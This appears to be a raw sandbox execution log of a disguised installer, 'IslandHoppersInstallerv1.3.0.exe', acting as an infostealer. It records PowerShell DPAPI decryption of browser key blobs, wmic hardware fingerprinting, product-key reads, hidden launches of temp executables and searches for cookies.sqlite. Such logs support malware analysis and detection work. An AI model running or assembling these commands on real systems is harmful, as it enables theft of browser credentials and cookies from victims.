C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,65,118,227,64,90,91,24,70,140,186,76,54,175,210,229,59,16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,124,33,230,177,155,163,191,120,106,96,217,164,186,156,233,189,33,12,59,85,74,89,216,159,145,5,183,37,212,105,228,249,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,163,123,12,209,104,80,51,164,79,110,37,21,19,218,70,144,23,149,218,57,253,47,12,108,201,246,154,230,51,204,189,51,48,0,0,0,220,38,18,178,228,79,29,150,249,18,143,151,58,62,4,228,125,226,68,37,72,14,184,1,91,188,237,128,85,122,239,247,58,28,173,154,165,223,4,255,29,128,22,190,180,43,98,165,64,0,0,0,104,116,170,164,7,33,137,82,205,20,102,203,146,189,88,92,9,184,170,237,14,63,35,12,59,150,140,83,173,104,112,148,180,123,114,163,225,162,203,243,171,234,152,101,129,222,102,232,148,83,63,117,187,52,72,102,239,137,119,236,89,154,25,234), $null, 'CurrentUser')"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,65,118,227,64,90,91,24,70,140,186,76,54,175,210,229,59,16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,124,33,230,177,155,163,191,120,106,96,217,164,186,156,233,189,33,12,59,85,74,89,216,159,145,5,183,37,212,105,228,249,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,163,123,12,209,104,80,51,164,79,110,37,21,19,218,70,144,23,149,218,57,253,47,12,108,201,246,154,230,51,204,189,51,48,0,0,0,220,38,18,178,228,79,29,150,249,18,143,151,58,62,4,228,125,226,68,37,72,14,184,1,91,188,237,128,85,122,239,247,58,28,173,154,165,223,4,255,29,128,22,190,180,43,98,165,64,0,0,0,104,116,170,164,7,33,137,82,205,20,102,203,146,189,88,92,9,184,170,237,14,63,35,12,59,150,140,83,173,104,112,148,180,123,114,163,225,162,203,243,171,234,152,101,129,222,102,232,148,83,63,117,187,52,72,102,239,137,119,236,89,154,25,234), $null, 'CurrentUser')

C:\Users\Admin\AppData\Local\Programs\IslandHoppersInstallerv1.3.0\IslandHoppersInstallerv1.3.0.exe

"C:\Users\Admin\AppData\Local\Programs\IslandHoppersInstallerv1.3.0\IslandHoppersInstallerv1.3.0.exe" --type=gpu-process --user-data-dir="C:\Users\Admin\AppData\Roaming\IslandHoppersInstallerv1.3.0" --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAABgAAAAAAAAAGAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1860 --field-trial-handle=1896,i,17368296473050591661,18063463359104572015,131072 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:2

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic cpu get name"

C:\Users\Admin\AppData\Local\Programs\IslandHoppersInstallerv1.3.0\IslandHoppersInstallerv1.3.0.exe

"C:\Users\Admin\AppData\Local\Programs\IslandHoppersInstallerv1.3.0\IslandHoppersInstallerv1.3.0.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Roaming\IslandHoppersInstallerv1.3.0" --mojo-platform-channel-handle=1908 --field-trial-handle=1896,i,17368296473050591661,18063463359104572015,131072 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:8

C:\Windows\System32\Wbem\WMIC.exe

wmic cpu get name

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic cpu get ProcessorId"

C:\Windows\System32\Wbem\WMIC.exe

wmic cpu get ProcessorId

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic baseboard get Product"

C:\Windows\System32\Wbem\WMIC.exe

wmic baseboard get Product

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic baseboard get SerialNumber"

C:\Windows\System32\Wbem\WMIC.exe

wmic baseboard get SerialNumber

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic OS get caption"

C:\Windows\System32\Wbem\WMIC.exe

wmic OS get caption

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic computersystem get TotalPhysicalMemory"

C:\Windows\System32\Wbem\WMIC.exe

wmic computersystem get TotalPhysicalMemory

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_videocontroller get caption,PNPDeviceID"

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_videocontroller get caption,PNPDeviceID

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic diskdrive get SerialNumber"

C:\Windows\System32\Wbem\WMIC.exe

wmic diskdrive get SerialNumber

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_computersystemproduct get uuid"

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_computersystemproduct get uuid

C:\Users\Admin\AppData\Local\Programs\IslandHoppersInstallerv1.3.0\IslandHoppersInstallerv1.3.0.exe

"C:\Users\Admin\AppData\Local\Programs\IslandHoppersInstallerv1.3.0\IslandHoppersInstallerv1.3.0.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,65,118,227,64,90,91,24,70,140,186,76,54,175,210,229,59,0,0,0,0,2,0,0,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,187,139,228,201,250,249,3,150,52,200,184,10,188,243,86,4,131,133,137,25,241,118,55,118,174,116,149,125,151,194,45,119,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,56,124,204,127,25,47,119,101,62,173,223,209,90,243,38,159,77,101,170,32,241,212,130,163,244,129,241,6,150,4,157,97,48,0,0,0,69,21,113,110,241,21,251,104,71,169,192,14,164,64,13,234,88,64,200,139,166,198,3,241,101,167,94,107,37,109,79,190,179,152,229,75,203,184,25,160,1,9,24,162,128,15,153,96,64,0,0,0,17,187,109,56,84,239,80,225,55,214,215,77,8,84,49,207,178,78,35,103,54,167,98,198,83,92,44,72,192,195,191,79,169,211,144,160,68,185,172,23,110,25,32,37,168,197,207,54,251,47,144,10,111,74,3,238,35,16,223,203,162,1,144,228), $null, 'CurrentUser')"

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,65,118,227,64,90,91,24,70,140,186,76,54,175,210,229,59,0,0,0,0,2,0,0,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,187,139,228,201,250,249,3,150,52,200,184,10,188,243,86,4,131,133,137,25,241,118,55,118,174,116,149,125,151,194,45,119,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,56,124,204,127,25,47,119,101,62,173,223,209,90,243,38,159,77,101,170,32,241,212,130,163,244,129,241,6,150,4,157,97,48,0,0,0,69,21,113,110,241,21,251,104,71,169,192,14,164,64,13,234,88,64,200,139,166,198,3,241,101,167,94,107,37,109,79,190,179,152,229,75,203,184,25,160,1,9,24,162,128,15,153,96,64,0,0,0,17,187,109,56,84,239,80,225,55,214,215,77,8,84,49,207,178,78,35,103,54,167,98,198,83,92,44,72,192,195,191,79,169,211,144,160,68,185,172,23,110,25,32,37,168,197,207,54,251,47,144,10,111,74,3,238,35,16,223,203,162,1,144,228), $null, 'CurrentUser')

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,65,118,227,64,90,91,24,70,140,186,76,54,175,210,229,59,16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,124,33,230,177,155,163,191,120,106,96,217,164,186,156,233,189,33,12,59,85,74,89,216,159,145,5,183,37,212,105,228,249,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,163,123,12,209,104,80,51,164,79,110,37,21,19,218,70,144,23,149,218,57,253,47,12,108,201,246,154,230,51,204,189,51,48,0,0,0,220,38,18,178,228,79,29,150,249,18,143,151,58,62,4,228,125,226,68,37,72,14,184,1,91,188,237,128,85,122,239,247,58,28,173,154,165,223,4,255,29,128,22,190,180,43,98,165,64,0,0,0,104,116,170,164,7,33,137,82,205,20,102,203,146,189,88,92,9,184,170,237,14,63,35,12,59,150,140,83,173,104,112,148,180,123,114,163,225,162,203,243,171,234,152,101,129,222,102,232,148,83,63,117,187,52,72,102,239,137,119,236,89,154,25,234), $null, 'CurrentUser')"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,65,118,227,64,90,91,24,70,140,186,76,54,175,210,229,59,16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,124,33,230,177,155,163,191,120,106,96,217,164,186,156,233,189,33,12,59,85,74,89,216,159,145,5,183,37,212,105,228,249,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,163,123,12,209,104,80,51,164,79,110,37,21,19,218,70,144,23,149,218,57,253,47,12,108,201,246,154,230,51,204,189,51,48,0,0,0,220,38,18,178,228,79,29,150,249,18,143,151,58,62,4,228,125,226,68,37,72,14,184,1,91,188,237,128,85,122,239,247,58,28,173,154,165,223,4,255,29,128,22,190,180,43,98,165,64,0,0,0,104,116,170,164,7,33,137,82,205,20,102,203,146,189,88,92,9,184,170,237,14,63,35,12,59,150,140,83,173,104,112,148,180,123,114,163,225,162,203,243,171,234,152,101,129,222,102,232,148,83,63,117,187,52,72,102,239,137,119,236,89,154,25,234), $null, 'CurrentUser')

C:\Users\Admin\AppData\Local\Programs\IslandHoppersInstallerv1.3.0\IslandHoppersInstallerv1.3.0.exe

"C:\Users\Admin\AppData\Local\Programs\IslandHoppersInstallerv1.3.0\IslandHoppersInstallerv1.3.0.exe" --type=gpu-process --user-data-dir="C:\Users\Admin\AppData\Roaming\IslandHoppersInstallerv1.3.0" --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAABgAAAAAAAAAGAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1852 --field-trial-handle=1860,i,13432203764811527437,14271230340257954960,131072 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:2

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic cpu get name"

C:\Users\Admin\AppData\Local\Programs\IslandHoppersInstallerv1.3.0\IslandHoppersInstallerv1.3.0.exe

"C:\Users\Admin\AppData\Local\Programs\IslandHoppersInstallerv1.3.0\IslandHoppersInstallerv1.3.0.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Roaming\IslandHoppersInstallerv1.3.0" --mojo-platform-channel-handle=1236 --field-trial-handle=1860,i,13432203764811527437,14271230340257954960,131072 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:8

C:\Windows\System32\Wbem\WMIC.exe

wmic cpu get name

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic cpu get ProcessorId"

C:\Windows\System32\Wbem\WMIC.exe

wmic cpu get ProcessorId

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic baseboard get Product"

C:\Windows\System32\Wbem\WMIC.exe

wmic baseboard get Product

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic baseboard get SerialNumber"

C:\Windows\System32\Wbem\WMIC.exe

wmic baseboard get SerialNumber

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic OS get caption"

C:\Windows\System32\Wbem\WMIC.exe

wmic OS get caption

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic computersystem get TotalPhysicalMemory"

C:\Windows\System32\Wbem\WMIC.exe

wmic computersystem get TotalPhysicalMemory

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_videocontroller get caption,PNPDeviceID"

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_videocontroller get caption,PNPDeviceID

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic diskdrive get SerialNumber"

C:\Windows\System32\Wbem\WMIC.exe

wmic diskdrive get SerialNumber

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_computersystemproduct get uuid"

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_computersystemproduct get uuid

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell -WindowStyle Hidden -Command "& {Start-Process -FilePath 'C:\Users\Admin\AppData\Local\Temp\1xev6.exe' -ArgumentList 'IVqoat7CfV' -WindowStyle Hidden}""

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -WindowStyle Hidden -Command "& {Start-Process -FilePath 'C:\Users\Admin\AppData\Local\Temp\1xev6.exe' -ArgumentList 'IVqoat7CfV' -WindowStyle Hidden}"

C:\Users\Admin\AppData\Local\Temp\1xev6.exe

"C:\Users\Admin\AppData\Local\Temp\1xev6.exe" IVqoat7CfV

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell -WindowStyle Hidden -Command "& {Start-Process -FilePath 'C:\Users\Admin\AppData\Local\Temp\txo0j6.exe' -ArgumentList 'IVqoat7CfV' -WindowStyle Hidden}""

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -WindowStyle Hidden -Command "& {Start-Process -FilePath 'C:\Users\Admin\AppData\Local\Temp\txo0j6.exe' -ArgumentList 'IVqoat7CfV' -WindowStyle Hidden}"

C:\Users\Admin\AppData\Local\Temp\txo0j6.exe

"C:\Users\Admin\AppData\Local\Temp\txo0j6.exe" IVqoat7CfV

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "where /r . cookies.sqlite"

C:\Windows\system32\where.exe

where /r . cookies.sqlite

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\taskmgr.exe

"C:\Windows\system32\taskmgr.exe" /0

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell -WindowStyle Hidden -Command "& {Start-Process -FilePath 'C:\Users\Admin\AppData\Local\Temp\hbbe7g.exe' -ArgumentList 'IVqoat7CfV' -WindowStyle Hidden}""

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -WindowStyle Hidden -Command "& {Start-Process -FilePath 'C:\Users\Admin\AppData\Local\Temp\hbbe7g.exe' -ArgumentList 'IVqoat7CfV' -WindowStyle Hidden}"

C:\Users\Admin\AppData\Local\Temp\hbbe7g.exe

"C:\Users\Admin\AppData\Local\Temp\hbbe7g.exe" IVqoat7CfV

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell -WindowStyle Hidden -Command "& {Start-Process -FilePath 'C:\Users\Admin\AppData\Local\Temp\5idqc5.exe' -ArgumentList 'IVqoat7CfV' -WindowStyle Hidden}""

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -WindowStyle Hidden -Command "& {Start-Process -FilePath 'C:\Users\Admin\AppData\Local\Temp\5idqc5.exe' -ArgumentList 'IVqoat7CfV' -WindowStyle Hidden}"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\tasklist.exe

tasklist

C:\Users\Admin\AppData\Local\Temp\5idqc5.exe

"C:\Users\Admin\AppData\Local\Temp\5idqc5.exe" IVqoat7CfV

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "where /r . cookies.sqlite"

C:\Windows\system32\where.exe

where /r . cookies.sqlite

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell -WindowStyle Hidden -Command "& {Start-Process -FilePath 'C:\Users\Admin\AppData\Local\Temp\cygqc.exe' -ArgumentList 'IVqoat7CfV' -WindowStyle Hidden}""

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -WindowStyle Hidden -Command "& {Start-Process -FilePath 'C:\Users\Admin\AppData\Local\Temp\cygqc.exe' -ArgumentList 'IVqoat7CfV' -WindowStyle Hidden}"

C:\Users\Admin\AppData\Local\Temp\cygqc.exe

"C:\Users\Admin\AppData\Local\Temp\cygqc.exe" IVqoat7CfV

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell -WindowStyle Hidden -Command "& {Start-Process -FilePath 'C:\Users\Admin\AppData\Local\Temp\ch5g4.exe' -ArgumentList 'IVqoat7CfV' -WindowStyle Hidden}""

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -WindowStyle Hidden -Command "& {Start-Process -FilePath 'C:\Users\Admin\AppData\Local\Temp\ch5g4.exe' -ArgumentList 'IVqoat7CfV' -WindowStyle Hidden}"

C:\Users\Admin\AppData\Local\Temp\ch5g4.exe

"C:\Users\Admin\AppData\Local\Temp\ch5g4.exe" IVqoat7CfV

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "where /r . cookies.sqlite"

C:\Windows\system32\where.exe

where /r . cookies.sqlite

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\tasklist.exe

tasklist

C:\Users\Admin\AppData\Local\Programs\IslandHoppersInstallerv1.3.0\IslandHoppersInstallerv1.3.0.exe

"C:\Users\Admin\AppData\Local\Programs\IslandHoppersInstallerv1.3.0\IslandHoppersInstallerv1.3.0.exe" --type=gpu-process --user-data-dir="C:\Users\Admin\AppData\Roaming\IslandHoppersInstallerv1.3.0" --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAABgAAAAAAAAAGAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1848 --field-trial-handle=1860,i,13432203764811527437,14271230340257954960,131072 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:2

C:\Users\Admin\AppData\Local\Programs\IslandHoppersInstallerv1.3.0\IslandHoppersInstallerv1.3.0.exe

"C:\Users\Admin\AppData\Local\Programs\IslandHoppersInstallerv1.3.0\IslandHoppersInstallerv1.3.0.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --user-data-dir="C:\Users\Admin\AppData\Roaming\IslandHoppersInstallerv1.3.0" --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAACQAAAAAAAAAAAAAAAAAAAAAAAAABgAAAAAAAAAGAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1668 --field-trial-handle=1944,i,1381989949723893370,14097480826959508823,131072 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:2

C:\Users\Admin\AppData\Local\Programs\IslandHoppersInstallerv1.3.0\IslandHoppersInstallerv1.3.0.exe

"C:\Users\Admin\AppData\Local\Programs\IslandHoppersInstallerv1.3.0\IslandHoppersInstallerv1.3.0.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --user-data-dir="C:\Users\Admin\AppData\Roaming\IslandHoppersInstallerv1.3.0" --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAACQAAAAAAAAAAAAAAAAAAAAAAAAABgAAAAAAAAAGAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2540 --field-trial-handle=1896,i,17368296473050591661,18063463359104572015,131072 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:2

C:\Users\Admin\AppData\Local\Programs\IslandHoppersInstallerv1.3.0\IslandHoppersInstallerv1.3.0.exe

"C:\Users\Admin\AppData\Local\Programs\IslandHoppersInstallerv1.3.0\IslandHoppersInstallerv1.3.0.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --user-data-dir="C:\Users\Admin\AppData\Roaming\IslandHoppersInstallerv1.3.0" --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAACQAAAAAAAAAAAAAAAAAAAAAAAAABgAAAAAAAAAGAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1888 --field-trial-handle=1860,i,13432203764811527437,14271230340257954960,131072 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:2

C:\Users\Admin\AppData\Local\Programs\IslandHoppersInstallerv1.3.0\IslandHoppersInstallerv1.3.0.exe

"C:\Users\Admin\AppData\Local\Programs\IslandHoppersInstallerv1.3.0\IslandHoppersInstallerv1.3.0.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,65,118,227,64,90,91,24,70,140,186,76,54,175,210,229,59,0,0,0,0,2,0,0,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,187,139,228,201,250,249,3,150,52,200,184,10,188,243,86,4,131,133,137,25,241,118,55,118,174,116,149,125,151,194,45,119,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,56,124,204,127,25,47,119,101,62,173,223,209,90,243,38,159,77,101,170,32,241,212,130,163,244,129,241,6,150,4,157,97,48,0,0,0,69,21,113,110,241,21,251,104,71,169,192,14,164,64,13,234,88,64,200,139,166,198,3,241,101,167,94,107,37,109,79,190,179,152,229,75,203,184,25,160,1,9,24,162,128,15,153,96,64,0,0,0,17,187,109,56,84,239,80,225,55,214,215,77,8,84,49,207,178,78,35,103,54,167,98,198,83,92,44,72,192,195,191,79,169,211,144,160,68,185,172,23,110,25,32,37,168,197,207,54,251,47,144,10,111,74,3,238,35,16,223,203,162,1,144,228), $null, 'CurrentUser')"

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,65,118,227,64,90,91,24,70,140,186,76,54,175,210,229,59,0,0,0,0,2,0,0,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,187,139,228,201,250,249,3,150,52,200,184,10,188,243,86,4,131,133,137,25,241,118,55,118,174,116,149,125,151,194,45,119,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,56,124,204,127,25,47,119,101,62,173,223,209,90,243,38,159,77,101,170,32,241,212,130,163,244,129,241,6,150,4,157,97,48,0,0,0,69,21,113,110,241,21,251,104,71,169,192,14,164,64,13,234,88,64,200,139,166,198,3,241,101,167,94,107,37,109,79,190,179,152,229,75,203,184,25,160,1,9,24,162,128,15,153,96,64,0,0,0,17,187,109,56,84,239,80,225,55,214,215,77,8,84,49,207,178,78,35,103,54,167,98,198,83,92,44,72,192,195,191,79,169,211,144,160,68,185,172,23,110,25,32,37,168,197,207,54,251,47,144,10,111,74,3,238,35,16,223,203,162,1,144,228), $null, 'CurrentUser')

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,65,118,227,64,90,91,24,70,140,186,76,54,175,210,229,59,16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,124,33,230,177,155,163,191,120,106,96,217,164,186,156,233,189,33,12,59,85,74,89,216,159,145,5,183,37,212,105,228,249,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,163,123,12,209,104,80,51,164,79,110,37,21,19,218,70,144,23,149,218,57,253,47,12,108,201,246,154,230,51,204,189,51,48,0,0,0,220,38,18,178,228,79,29,150,249,18,143,151,58,62,4,228,125,226,68,37,72,14,184,1,91,188,237,128,85,122,239,247,58,28,173,154,165,223,4,255,29,128,22,190,180,43,98,165,64,0,0,0,104,116,170,164,7,33,137,82,205,20,102,203,146,189,88,92,9,184,170,237,14,63,35,12,59,150,140,83,173,104,112,148,180,123,114,163,225,162,203,243,171,234,152,101,129,222,102,232,148,83,63,117,187,52,72,102,239,137,119,236,89,154,25,234), $null, 'CurrentUser')"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

